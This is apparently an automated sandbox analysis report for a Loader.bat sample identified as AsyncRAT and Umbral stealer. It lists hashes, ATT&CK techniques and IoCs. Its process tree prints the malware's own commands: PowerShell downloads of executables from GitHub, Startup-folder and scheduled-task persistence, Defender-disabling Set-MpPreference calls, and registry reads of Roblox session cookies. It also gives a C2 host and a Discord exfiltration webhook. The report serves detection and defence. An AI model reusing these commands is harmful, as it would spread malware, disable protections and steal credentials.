asyncrat | 504e74f223f13c996066449c7f279eb32a61f80f80c9e87d31cfdca6fee7373f

Analysis

max time kernel
150s
max time network
143s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
25/11/2024, 12:40

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

Loader.bat
Size

1KB
MD5

84d66a793f6d1f8fb1f4726ee735f55e
SHA1

db7f145a9685a3911f02bbc61a02546da06e68d9
SHA256

504e74f223f13c996066449c7f279eb32a61f80f80c9e87d31cfdca6fee7373f
SHA512

ab172682c693815c9bb902f395632785e0b24981f05eef61244c4311aabb79f94a4af9e1dc978ab2f3caa5b4db1b5cdd2ad896a61d4d8bb747750d702f1b907e

Score

10^/10

asyncrat umbral default discovery execution rat spyware stealer

Malware Config

Extracted

Family

asyncrat

Botnet

Default

technical-southwest.gl.at.ply.gg:58694

Attributes

delay
1
install
true
install_file
WINDOWS.exe
install_folder
%AppData%

aes.plain

Extracted

Family

umbral

https://discordapp.com/api/webhooks/1310580388070031360/HcT5cAwFckSLk1OKu346uVDw7gzPyJJvcWmU8BKJrBQSUsE3Q1GCqDtVn5MK3JlldJBn

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0009000000023cbe-59.dat	family_umbral
behavioral2/memory/2716-63-0x0000023449900000-0x0000023449940000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral2/files/0x0009000000023cba-31.dat	family_asyncrat

Blocklisted process makes network request 4 IoCs

flow	pid	Process
7	1568	powershell.exe
11	1568	powershell.exe
21	3364	powershell.exe
22	3364	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4356	powershell.exe
1160	powershell.exe
3280	powershell.exe
1568	powershell.exe
3364	powershell.exe
1352	powershell.exe
4936	powershell.exe
2920	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Loader.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	output.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Loader.lnk	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\output.lnk	powershell.exe

Executes dropped EXE 3 IoCs

pid	Process
3152	output.exe
2716	Loader.exe
1900	WINDOWS.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
26	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1460	cmd.exe
720	PING.EXE

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
3900	timeout.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3772	wmic.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
720	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3892	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1568	powershell.exe
1568	powershell.exe
4936	powershell.exe
4936	powershell.exe
3364	powershell.exe
3364	powershell.exe
2920	powershell.exe
2920	powershell.exe
3152	output.exe
3152	output.exe
3152	output.exe
3152	output.exe
3152	output.exe
3152	output.exe
3152	output.exe
3152	output.exe
3152	output.exe
3152	output.exe
3152	output.exe
3152	output.exe
3152	output.exe
3152	output.exe
3152	output.exe
3152	output.exe
3152	output.exe
3152	output.exe
3152	output.exe
3152	output.exe
3152	output.exe
3152	output.exe
3152	output.exe
3152	output.exe
3152	output.exe
3152	output.exe
3152	output.exe
3152	output.exe
3152	output.exe
3152	output.exe
3152	output.exe
3152	output.exe
3152	output.exe
3152	output.exe
3152	output.exe
1352	powershell.exe
1352	powershell.exe
4356	powershell.exe
4356	powershell.exe
1160	powershell.exe
1160	powershell.exe
2100	powershell.exe
2100	powershell.exe
3280	powershell.exe
3280	powershell.exe
1900	WINDOWS.exe
1900	WINDOWS.exe
1900	WINDOWS.exe
1900	WINDOWS.exe
1900	WINDOWS.exe
1900	WINDOWS.exe
1900	WINDOWS.exe
1900	WINDOWS.exe
1900	WINDOWS.exe
1900	WINDOWS.exe
1900	WINDOWS.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1568	powershell.exe
Token: SeDebugPrivilege	4936	powershell.exe
Token: SeDebugPrivilege	3364	powershell.exe
Token: SeDebugPrivilege	2920	powershell.exe
Token: SeDebugPrivilege	3152	output.exe
Token: SeDebugPrivilege	3152	output.exe
Token: SeDebugPrivilege	2716	Loader.exe
Token: SeDebugPrivilege	1352	powershell.exe
Token: SeDebugPrivilege	4356	powershell.exe
Token: SeDebugPrivilege	1160	powershell.exe
Token: SeDebugPrivilege	2100	powershell.exe
Token: SeIncreaseQuotaPrivilege	1772	wmic.exe
Token: SeSecurityPrivilege	1772	wmic.exe
Token: SeTakeOwnershipPrivilege	1772	wmic.exe
Token: SeLoadDriverPrivilege	1772	wmic.exe
Token: SeSystemProfilePrivilege	1772	wmic.exe
Token: SeSystemtimePrivilege	1772	wmic.exe
Token: SeProfSingleProcessPrivilege	1772	wmic.exe
Token: SeIncBasePriorityPrivilege	1772	wmic.exe
Token: SeCreatePagefilePrivilege	1772	wmic.exe
Token: SeBackupPrivilege	1772	wmic.exe
Token: SeRestorePrivilege	1772	wmic.exe
Token: SeShutdownPrivilege	1772	wmic.exe
Token: SeDebugPrivilege	1772	wmic.exe
Token: SeSystemEnvironmentPrivilege	1772	wmic.exe
Token: SeRemoteShutdownPrivilege	1772	wmic.exe
Token: SeUndockPrivilege	1772	wmic.exe
Token: SeManageVolumePrivilege	1772	wmic.exe
Token: 33	1772	wmic.exe
Token: 34	1772	wmic.exe
Token: 35	1772	wmic.exe
Token: 36	1772	wmic.exe
Token: SeIncreaseQuotaPrivilege	1772	wmic.exe
Token: SeSecurityPrivilege	1772	wmic.exe
Token: SeTakeOwnershipPrivilege	1772	wmic.exe
Token: SeLoadDriverPrivilege	1772	wmic.exe
Token: SeSystemProfilePrivilege	1772	wmic.exe
Token: SeSystemtimePrivilege	1772	wmic.exe
Token: SeProfSingleProcessPrivilege	1772	wmic.exe
Token: SeIncBasePriorityPrivilege	1772	wmic.exe
Token: SeCreatePagefilePrivilege	1772	wmic.exe
Token: SeBackupPrivilege	1772	wmic.exe
Token: SeRestorePrivilege	1772	wmic.exe
Token: SeShutdownPrivilege	1772	wmic.exe
Token: SeDebugPrivilege	1772	wmic.exe
Token: SeSystemEnvironmentPrivilege	1772	wmic.exe
Token: SeRemoteShutdownPrivilege	1772	wmic.exe
Token: SeUndockPrivilege	1772	wmic.exe
Token: SeManageVolumePrivilege	1772	wmic.exe
Token: 33	1772	wmic.exe
Token: 34	1772	wmic.exe
Token: 35	1772	wmic.exe
Token: 36	1772	wmic.exe
Token: SeIncreaseQuotaPrivilege	3168	wmic.exe
Token: SeSecurityPrivilege	3168	wmic.exe
Token: SeTakeOwnershipPrivilege	3168	wmic.exe
Token: SeLoadDriverPrivilege	3168	wmic.exe
Token: SeSystemProfilePrivilege	3168	wmic.exe
Token: SeSystemtimePrivilege	3168	wmic.exe
Token: SeProfSingleProcessPrivilege	3168	wmic.exe
Token: SeIncBasePriorityPrivilege	3168	wmic.exe
Token: SeCreatePagefilePrivilege	3168	wmic.exe
Token: SeBackupPrivilege	3168	wmic.exe
Token: SeRestorePrivilege	3168	wmic.exe

Suspicious use of WriteProcessMemory 46 IoCs

description	pid	Process	procid_target
PID 2752 wrote to memory of 1568	2752	cmd.exe	84
PID 2752 wrote to memory of 1568	2752	cmd.exe	84
PID 2752 wrote to memory of 4936	2752	cmd.exe	85
PID 2752 wrote to memory of 4936	2752	cmd.exe	85
PID 2752 wrote to memory of 3152	2752	cmd.exe	89
PID 2752 wrote to memory of 3152	2752	cmd.exe	89
PID 2752 wrote to memory of 3364	2752	cmd.exe	90
PID 2752 wrote to memory of 3364	2752	cmd.exe	90
PID 2752 wrote to memory of 2920	2752	cmd.exe	95
PID 2752 wrote to memory of 2920	2752	cmd.exe	95
PID 2752 wrote to memory of 2716	2752	cmd.exe	96
PID 2752 wrote to memory of 2716	2752	cmd.exe	96
PID 3152 wrote to memory of 220	3152	output.exe	97
PID 3152 wrote to memory of 220	3152	output.exe	97
PID 3152 wrote to memory of 1440	3152	output.exe	99
PID 3152 wrote to memory of 1440	3152	output.exe	99
PID 220 wrote to memory of 3892	220	cmd.exe	101
PID 220 wrote to memory of 3892	220	cmd.exe	101
PID 1440 wrote to memory of 3900	1440	cmd.exe	102
PID 1440 wrote to memory of 3900	1440	cmd.exe	102
PID 2716 wrote to memory of 1392	2716	Loader.exe	103
PID 2716 wrote to memory of 1392	2716	Loader.exe	103
PID 2716 wrote to memory of 1352	2716	Loader.exe	105
PID 2716 wrote to memory of 1352	2716	Loader.exe	105
PID 2716 wrote to memory of 4356	2716	Loader.exe	107
PID 2716 wrote to memory of 4356	2716	Loader.exe	107
PID 2716 wrote to memory of 1160	2716	Loader.exe	109
PID 2716 wrote to memory of 1160	2716	Loader.exe	109
PID 2716 wrote to memory of 2100	2716	Loader.exe	111
PID 2716 wrote to memory of 2100	2716	Loader.exe	111
PID 2716 wrote to memory of 1772	2716	Loader.exe	115
PID 2716 wrote to memory of 1772	2716	Loader.exe	115
PID 2716 wrote to memory of 3168	2716	Loader.exe	117
PID 2716 wrote to memory of 3168	2716	Loader.exe	117
PID 2716 wrote to memory of 4324	2716	Loader.exe	119
PID 2716 wrote to memory of 4324	2716	Loader.exe	119
PID 1440 wrote to memory of 1900	1440	cmd.exe	121
PID 1440 wrote to memory of 1900	1440	cmd.exe	121
PID 2716 wrote to memory of 3280	2716	Loader.exe	122
PID 2716 wrote to memory of 3280	2716	Loader.exe	122
PID 2716 wrote to memory of 3772	2716	Loader.exe	124
PID 2716 wrote to memory of 3772	2716	Loader.exe	124
PID 2716 wrote to memory of 1460	2716	Loader.exe	126
PID 2716 wrote to memory of 1460	2716	Loader.exe	126
PID 1460 wrote to memory of 720	1460	cmd.exe	130
PID 1460 wrote to memory of 720	1460	cmd.exe	130

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1392	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Loader.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2752
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Invoke-WebRequest -Uri https://github.com/Realmastercoder69/uu/releases/download/dss/Loader.exe -OutFile C:\Users\Admin\Desktop\output.exe -ErrorAction SilentlyContinue"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1568
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$WScriptShell = New-Object -ComObject WScript.Shell; $shortcut1 = $WScriptShell.CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\output.lnk'); $shortcut1.TargetPath = 'C:\Users\Admin\Desktop\output.exe'; $shortcut1.Save()"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops startup file
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4936
- C:\Users\Admin\Desktop\output.exe
  C:\Users\Admin\Desktop\output.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3152
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WINDOWS" /tr '"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"' & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:220
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "WINDOWS" /tr '"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"'
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpB054.tmp.bat""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1440
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:3900
  - - C:\Users\Admin\AppData\Roaming\WINDOWS.exe
      "C:\Users\Admin\AppData\Roaming\WINDOWS.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:1900
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Invoke-WebRequest -Uri https://github.com/Realmastercoder69/dsafffffffff/releases/download/dasa/saloader.exe -OutFile C:\Users\Admin\Desktop\Loader.exe -ErrorAction SilentlyContinue"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3364
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$WScriptShell = New-Object -ComObject WScript.Shell; $shortcut2 = $WScriptShell.CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Loader.lnk'); $shortcut2.TargetPath = 'C:\Users\Admin\Desktop\Loader.exe'; $shortcut2.Save()"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops startup file
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2920
- C:\Users\Admin\Desktop\Loader.exe
  C:\Users\Admin\Desktop\Loader.exe
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2716
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\Desktop\Loader.exe"
    3⤵
    - Views/modifies file attributes
    PID:1392
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Loader.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1352
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4356
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1160
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2100
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1772
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3168
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:4324
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3280
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:3772
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Desktop\Loader.exe" && pause
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Suspicious use of WriteProcessMemory
    PID:1460
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:720

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
c9b6705519e1eef08f86c4ba5f4286f3

SHA1
6c6b179e452ecee2673a1d4fe128f1c06f70577f

SHA256
0f9cad44a79126871580e19b01dc3f880c5173b1faaf8b9018d5d1f829714705

SHA512
6d8f85a7a8b0b124530f36a157cd0441b5c1eacdc35e274af9fbf0569d03d1d5e468651a5b2425f0215c282ecfa7b1ffeaeeaf18612822f00bd14306d30640c7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
548dd08570d121a65e82abb7171cae1c

SHA1
1a1b5084b3a78f3acd0d811cc79dbcac121217ab

SHA256
cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc

SHA512
37b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7511c81925750deb7ad1b9b80eea8a8d

SHA1
6ea759b3cbd243ae11435c6d6c5ced185eb01f49

SHA256
5b49723a7773f2fe1f6093236e7b9b2c546f0873635d02346cb39535811234fa

SHA512
5f7e69316d39525d137a7a833f8c746ceef8f1b2295348393fb3244cca8b962fbaad0f7da49da453fe97e2c49b1f41f06138111ac5ff97fdc33c300350ec3a1b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
612b19feac3b60bdc771ec888769ea75

SHA1
cc0117dc3f83e139f22d7c9f068a0fa2027fc8fb

SHA256
3eb12f5e02a7aad8764186e1f62d9cebcc8667c854ebf4356fe404f042b84ec1

SHA512
2f56333015641eb11b853a350ca5a01763ab9fd2d572fca51ba2d7df3018546c9667a64ba670e443e0fef5c10879964bfe18084ae0b44e95cb17dcc864ffd4af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
efad4265f7a649a87389e47febd71e5d

SHA1
6c298f00f14dd89c376d08d92672e491fa736682

SHA256
adae8ad2fd2d158f1d47b81e03119f5060c35c087f6f163a6c4f68cce642c584

SHA512
2bedfd67cc7e028bb6c144cb01d13d7b883e13bd8d78faa56e57b0315f15e0a92b6e9c832179e6b51f9a4a61273d3abf759ef0724cdf9de096136d42f119eb86

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
995e6371567c506c285310c0032f0167

SHA1
b40ac1d37c36940b649c3c04a87b1440a416db6f

SHA256
b0a796b16138889dab152463f4045dbba451a6573a3debcef504aaf039786239

SHA512
140dbb9e22d6d3c34360179e9d67882f6dd7173a8f6d2c63cca647dc221d713f019e0d0055af6f6dea62d63680d1ab1b7842a12b2e70730bd42c8cf078c49ae6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
840ac3d324f52b954dbdcbd4dde42bc1

SHA1
83852d0f637b7ba61ed8dfad98881868fcd164f4

SHA256
2db658a1873fd5282386b2210bfeabf2994e52d43c25518a95bbf37519a25e6e

SHA512
01a9ab6ed8c1af5ff6d6f8a8d048e8ef232c9d41080aa9dd2ec7c58ff44f018b568976510ad91ce9304963143265f126bcc54edb1c5032c8e51139835329bdcd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
839300dba3461fcfa4df3e752e6ca29d

SHA1
0d77520c46cfba5268b5d3ce4ef3bf7dd2190162

SHA256
2638591b2115af56e611fed1fb6cddfaafff31b974fa5d90f2b0a985ca5256b1

SHA512
f06cb7ba2a3bbdf07044eec8f47f0912d47a9e7f2c9e8158f18bff9474e9725ae0bc245d05879978aee5bc0d18f62782854ce260af2e635c40bd693f046eec46

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xhrm54ok.u42.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpB054.tmp.bat

Filesize
151B

MD5
bb00542481f5a0134db06f82b894fa74

SHA1
0325851701418b81c7c1b1dc48f8af4696c756e7

SHA256
d8ef11a3f6ebc715f7e8e4ec42b0e7d8b6a7f652349350a7d830e6cd5dad1cb8

SHA512
2af8c374100c9ae97530b244b749b3946c9e33d2bdbab324fb478310d6081427b37e349c2bae090a2dd425cbeeb31db5b2842a8b777c0f9735603963420e00ba

Download Submit
C:\Users\Admin\Desktop\Loader.exe

Filesize
229KB

MD5
1e10af7811808fc24065f18535cf1220

SHA1
65995bcb862aa66988e1bb0dbff75dcac9b400c7

SHA256
e07fd0ac793b06603be164c9ee73465af512cf17bed07614cbcd2a8410f04eed

SHA512
f1c623918a3701254805e7648d671b316446a0f98637d3de62d44331cf91502afb57ccb762472491bc4ac037fbf5f7b624eb9d39092b3be0b2ed84da6f3acadc

Download Submit
C:\Users\Admin\Desktop\output.exe

Filesize
63KB

MD5
7ceb11ebb7a55e33a82bc3b66f554e79

SHA1
8dfd574ad06ded662d92d81b72f14c1914ac45b5

SHA256
aea3e89e45a33441bcd06c990282f8601eb960a641c611222dce2fe09685e603

SHA512
d8cd7af50996015163c8926fc7b6df6a6e2c0b3f6c8fcff37cad5b72fed115f7134723d99f61a20576b83e67107a3a410f5ef2312191446b3d0759cb739e6ccd

Download Submit
memory/1568-12-0x00007FFABFA60000-0x00007FFAC0521000-memory.dmp

Filesize
10.8MB

Download
memory/1568-0-0x00007FFABFA63000-0x00007FFABFA65000-memory.dmp

Filesize
8KB

Download
memory/1568-16-0x00007FFABFA60000-0x00007FFAC0521000-memory.dmp

Filesize
10.8MB

Download
memory/1568-11-0x00007FFABFA60000-0x00007FFAC0521000-memory.dmp

Filesize
10.8MB

Download
memory/1568-10-0x00000224B23E0000-0x00000224B2402000-memory.dmp

Filesize
136KB

Download
memory/2716-93-0x0000023464140000-0x00000234641B6000-memory.dmp

Filesize
472KB

Download
memory/2716-63-0x0000023449900000-0x0000023449940000-memory.dmp

Filesize
256KB

Download
memory/2716-94-0x00000234641C0000-0x0000023464210000-memory.dmp

Filesize
320KB

Download
memory/2716-95-0x0000023464250000-0x000002346426E000-memory.dmp

Filesize
120KB

Download
memory/2716-132-0x00000234640E0000-0x00000234640EA000-memory.dmp

Filesize
40KB

Download
memory/2716-133-0x0000023464110000-0x0000023464122000-memory.dmp

Filesize
72KB

Download
memory/2716-156-0x0000023463D00000-0x0000023463E02000-memory.dmp

Filesize
1.0MB

Download
memory/3152-36-0x0000000000760000-0x0000000000776000-memory.dmp

Filesize
88KB

Download
memory/4936-34-0x00007FFABFA60000-0x00007FFAC0521000-memory.dmp

Filesize
10.8MB

Download
memory/4936-29-0x00007FFABFA60000-0x00007FFAC0521000-memory.dmp

Filesize
10.8MB

Download
memory/4936-28-0x00007FFABFA60000-0x00007FFAC0521000-memory.dmp

Filesize
10.8MB

Download
memory/4936-18-0x00007FFABFA60000-0x00007FFAC0521000-memory.dmp

Filesize
10.8MB

Download